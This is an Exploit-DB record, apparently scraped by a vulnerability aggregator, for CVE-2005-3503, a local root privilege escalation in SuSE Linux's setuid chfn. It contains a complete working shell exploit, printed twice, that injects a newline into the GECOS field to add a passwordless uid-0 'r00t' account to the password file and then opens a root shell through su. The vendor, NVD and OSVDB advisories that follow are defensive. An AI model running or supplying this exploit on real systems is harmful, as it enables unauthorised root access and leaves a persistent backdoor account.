SuSE Linux <= 9.3 / 10 - chfn Local Root Privilege Escalation Exploit
2005-11-08T00:00:00
ID EDB-ID:1299 Type exploitdb Reporter Hunger Modified 2005-11-08T00:00:00
Description
SuSE Linux <= 9.3, 10 (chfn) Local Root Privilege Escalation Exploit. CVE-2005-3503. Local exploit for linux platform
#!/bin/sh
#
# Exploit for SuSE Linux 9.{1,2,3}/10.0, Desktop 1.0, UnitedLinux 1.0
# and SuSE Linux Enterprise Server {8,9} 'chfn' local root bug.
#
# by Hunger <susechfn@hunger.hu>
#
# Advistory:
# http://lists.suse.com/archive/suse-security-announce/2005-Nov/0002.html
#
# hunger@suse:~> id
# uid=1000(hunger) gid=1000(hunger) groups=1000(hunger)
# hunger@suse:~> ./susechfn.sh
# Type your current password to get root... :)
# Password:
# sh-2.05b# id
# uid=0(r00t) gid=0(root) groups=0(root)
if [ X"$SHELL" = "X" ]; then
echo "No SHELL environment, using /bin/sh for default."
export SHELL=/bin/sh
fi
if [ -u /usr/bin/chfn ]; then
/bin/echo "Type your current password to get root... :)"
/usr/bin/chfn -h "`echo -e ':/:'$SHELL'\nr00t::0:0:'`" $USER > /dev/null
if [ -u /bin/su ]; then
/bin/su r00t
/bin/echo "You can get root again with 'su r00t'"
else
echo "/bin/su file is not setuid root :("
fi
else
echo "/usr/bin/chfn file is not setuid root :("
fi
# milw0rm.com [2005-11-08]
{"id": "EDB-ID:1299", "hash": "f39135ac5ff21d1e65f760db71ca736c", "type": "exploitdb", "bulletinFamily": "exploit", "title": "SuSE Linux <= 9.3 / 10 - chfn Local Root Privilege Escalation Exploit", "description": "SuSE Linux <= 9.3, 10 (chfn) Local Root Privilege Escalation Exploit. CVE-2005-3503. Local exploit for linux platform", "published": "2005-11-08T00:00:00", "modified": "2005-11-08T00:00:00", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/1299/", "reporter": "Hunger", "references": [], "cvelist": ["CVE-2005-3503"], "lastseen": "2016-01-31T13:57:49", "history": [], "viewCount": 8, "enchantments": {"score": {"value": 6.0, "vector": "NONE", "modified": "2016-01-31T13:57:49"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2005-3503"]}, {"type": "canvas", "idList": ["CHFNESCAPE"]}, {"type": "osvdb", "idList": ["OSVDB:20525"]}, {"type": "suse", "idList": ["SUSE-SA:2005:064"]}], "modified": "2016-01-31T13:57:49"}, "vulnersScore": 6.0}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/1299/", "sourceData": "#!/bin/sh\n#\n# Exploit for SuSE Linux 9.{1,2,3}/10.0, Desktop 1.0, UnitedLinux 1.0\n# and SuSE Linux Enterprise Server {8,9} 'chfn' local root bug.\n# \n# by Hunger <susechfn@hunger.hu>\n#\n# Advistory:\n# http://lists.suse.com/archive/suse-security-announce/2005-Nov/0002.html\n# \n# hunger@suse:~> id\n# uid=1000(hunger) gid=1000(hunger) groups=1000(hunger)\n# hunger@suse:~> ./susechfn.sh\n# Type your current password to get root... :)\n# Password:\n# sh-2.05b# id\n# uid=0(r00t) gid=0(root) groups=0(root)\n\nif [ X\"$SHELL\" = \"X\" ]; then\n\techo \"No SHELL environment, using /bin/sh for default.\"\n\texport SHELL=/bin/sh\nfi\n\nif [ -u /usr/bin/chfn ]; then\n\t/bin/echo \"Type your current password to get root... :)\"\n\t/usr/bin/chfn -h \"`echo -e ':/:'$SHELL'\\nr00t::0:0:'`\" $USER > /dev/null\n\tif [ -u /bin/su ]; then\n\t\t/bin/su r00t\n\t\t/bin/echo \"You can get root again with 'su r00t'\"\n\telse \n\t\techo \"/bin/su file is not setuid root :(\"\n\tfi\nelse\necho \"/usr/bin/chfn file is not setuid root :(\"\nfi\n\n# milw0rm.com [2005-11-08]\n", "osvdbidlist": ["20525"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}
{"cve": [{"lastseen": "2019-05-29T18:08:15", "bulletinFamily": "NVD", "description": "chfn in pwdutils 3.0.4 and earlier on SuSE Linux, and possibly other operating systems, does not properly check arguments for the GECOS field, which allows local users to gain privileges.", "modified": "2018-10-19T15:36:00", "id": "CVE-2005-3503", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-3503", "published": "2005-11-05T11:02:00", "title": "CVE-2005-3503", "type": "cve", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "canvas": [{"lastseen": "2019-05-29T17:19:20", "bulletinFamily": "exploit", "description": "**Name**| chfnescape \n---|--- \n**CVE**| CVE-2005-3503 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| chfnescape \n**Notes**| References: http://lists.suse.com/archive/suse-security-announce/2005-Nov/0002.html \nCVE Name: CVE-2005-3503 \nAffected: SuSE Linux 9.0 through 10.0, Suse Linux Desktop 1.0, SLES 9, UnitedLinux 1.0 \nVENDOR: SuSE \nNotes: This exploit returns you a Unixshell Node when successful. It will add a r00t user to the password file, which you will have to clean up manually afterwards. If you are already UID or EUID 0, this exploit will refuse to run - use setuid instead. \nDate public: 11/5/2005 \nCVE Url: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3503 \nCVSS: 7.2 \n\n", "modified": "2005-11-05T11:02:00", "published": "2005-11-05T11:02:00", "id": "CHFNESCAPE", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/chfnescape", "type": "canvas", "title": "Immunity Canvas: CHFNESCAPE", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "suse": [{"lastseen": "2016-09-04T11:17:43", "bulletinFamily": "unix", "description": "Thomas Gerisch found that the setuid 'chfn' program contained in the pwdutils suite insufficiently checks it's arguments when changing the GECOS field. This bug leads to a trivially exploitable local privilege escalation that allows users to gain root access. We like to thank Thomas Gerisch for pointing out the problem.\n#### Solution\nRemoving the setuid bit from /usr/bin/chfn renders chfn useless but also prevents successful exploitation. Note that this workaround only lasts until the next run of SuSEconfig which will restore the setuid bit if you are on permissions level 'easy' or 'secure'.", "modified": "2005-11-04T14:22:08", "published": "2005-11-04T14:22:08", "id": "SUSE-SA:2005:064", "href": "http://lists.opensuse.org/opensuse-security-announce/2005-11/msg00008.html", "title": "local privilege escalation in pwdutils, shadow", "type": "suse", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:17", "bulletinFamily": "software", "description": "## Vulnerability Description\nSUSE Linux contains a flaw that may allow a malicious user to gain access to unauthorized privileges. The problem is that the setuid 'chfn' binary in the 'pwdutils' suite does not properly check arguments when changing the 'GECOS' field, which may allow a malicious user to gain access to root privileges resulting in a loss of integrity.\n## Solution Description\nContact the vendor for an appropriate upgrade. An upgrade is required as there are no known workarounds.\n## Short Description\nSUSE Linux contains a flaw that may allow a malicious user to gain access to unauthorized privileges. The problem is that the setuid 'chfn' binary in the 'pwdutils' suite does not properly check arguments when changing the 'GECOS' field, which may allow a malicious user to gain access to root privileges resulting in a loss of integrity.\n## References:\nVendor URL: http://www.novell.com/\n[Secunia Advisory ID:17469](https://secuniaresearch.flexerasoftware.com/advisories/17469/)\nOther Advisory URL: http://lists.suse.com/archive/suse-security-announce/2005-Nov/0002.html\nKeyword: SUSE-SA:2005:064\n[CVE-2005-3503](https://vulners.com/cve/CVE-2005-3503)\nBugtraq ID: 15314\n", "modified": "2005-11-04T00:00:00", "published": "2005-11-04T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:20525", "id": "OSVDB:20525", "type": "osvdb", "title": "SUSE Linux pwdutils chfn Local Privilege Escalation", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}
